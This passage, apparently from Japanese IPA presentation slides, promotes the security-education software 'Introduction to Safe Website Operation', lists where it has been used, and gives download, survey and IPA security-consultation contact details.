ブログ ：30 以上ものブログで評価

「このようなゲーム感覚でセキュリティについて学ぶというのは、より実践的な経験を積むことができるので、セキ

ュリティ教育にはとてもよい教材だと思いますグッド！」できれば、小学校、中学校、そして高校の授業でこのソフ

トを用いたセキュリティ教育をしていただきたいものです。（出典：情報セキュリティ学院）

4.4 安全なウェブサイト運営入門

z 社内教育や大学授業、イベントでの利用も

社内教育 ： コンサルティング会社、他 大学授業 ： A 大学

イベントでのセキュリティ啓蒙 ： 地域ict未来フェスタ2008inとくしま

メーリングリスト ： N地域地場産業振興センター

4.4 安全なウェブサイト運営入門

z ダウンロード

z アンケート協力のお願い

本日配布したＣＤ－ＲＯＭ内に、「安全なウェブ サイト運営入門」が入っておりますので、是非、

ご利用頂きたく思います。

今後の普及啓発ツール・資料等の作成に活用さ せていただくため、同封のアンケートにご協力頂 き、記載の電話番号に ＦＡＸ をお願い致します。

¾ 「安全なウェブサイト運営入門」－７つの事件を体験し、ウェブサイトを守り抜け！－

http://www.ipa.go.jp/security/vuln/7incidents/index.html

セキュリティセンター（ IPA/ISEC ） http://www.ipa.go.jp/security/

★情報セキュリティ関連相談窓口：

ＴＥＬ ０３（５９７８）７５０９ (平日10:00-12:00、13:30-17:00)

ＦＡＸ ０３（５９７８）７５１８

E-mail： [email protected] (ウイルス関連)

[email protected] (不正アクセス関連) [email protected] (Winny関連)

[email protected] (その他セキュリティ全般)